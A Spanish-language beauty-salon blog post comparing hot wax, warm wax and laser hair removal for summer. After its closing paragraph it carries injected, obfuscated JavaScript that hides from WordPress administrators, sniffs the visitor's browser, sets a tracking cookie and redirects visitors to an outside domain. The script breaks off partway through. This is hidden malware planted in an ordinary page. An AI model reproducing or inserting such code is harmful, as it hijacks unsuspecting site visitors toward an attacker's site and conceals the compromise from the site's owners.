Llega el verano y es hora de sacar vestidos, shorts y ropa fresca y ligera para el verano. Ahora bien… ¿que método de depilación elegimos?
La verdad es que todas queremos que independientemente del método que utilicemos para depilarnos, nuestras piernas luzcan el máximo tiempo posible sin rastro de vello. Así que si queremos lucir piernas bonitas y sin vello durante 3 o 4 semanas deberemos de elegir un método que arranque nuestro vello de raiz.

Las opciones son varias, entre ellas la cera caliente o cera tibia (Esta última muy aconsejada ya que la pueden utilizar personas con problemas de circulación o con varices) ambas arrancan el vello de raiz y luciremos piernas perfectas durante más o menos un mes. La diferencia entre ellas es simplemente la temperatura que alcanzan. Estos dos métodos, utilizados con frecuencia, llegan a debilitar la raiz y con el tiempo tendremos cada vez menos vello. Así mismo es aconsejable exfoliar la piel antes de la depilación y utilizar un producto post-depilación que retarde el crecimiento.

La depilación con cera caliente sigue siendo recomendable para algunas zonas como las axilas o las ingles ya que arranca casi el 100% del vello a la primera y podemos ser incluso más precisos en las zonas a depilar.

La depilación con cera (sea tibia o caliente) es el método elegido por la mayoria de mujeres y hombres ya que es duradera y cómoda, no “indolora” aunque eso depende mucho de cada persona, el umbral del dolor no es el mismo para todo el mundo. Si bien existen otras opciones como puede ser la depilación láser o definitiva, con la cual el vello desaparece permanentemente, no todos podemos beneficiarnos de ellos, ya sea por nuestro tipo de piel o porque no está aconsejado en algunos casos. Este tipo de depilación funciona muy bien en vellos muy oscuros y fuertes, así mismo necesitaremos varias sesiones para eliminarlo definitivamente, y en cambio el vello más claro o débil es más resistente a este tipo de depilación y no está aconsejado.

Si tenéis alguna duda o queréis saber que método es el mejor para vosotras, nuestras estecicistas están a vuestra disposición en cualquiera de nuestros centros, ellas os asesorarán en cada caso de cual es la mejor opción a elegir. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone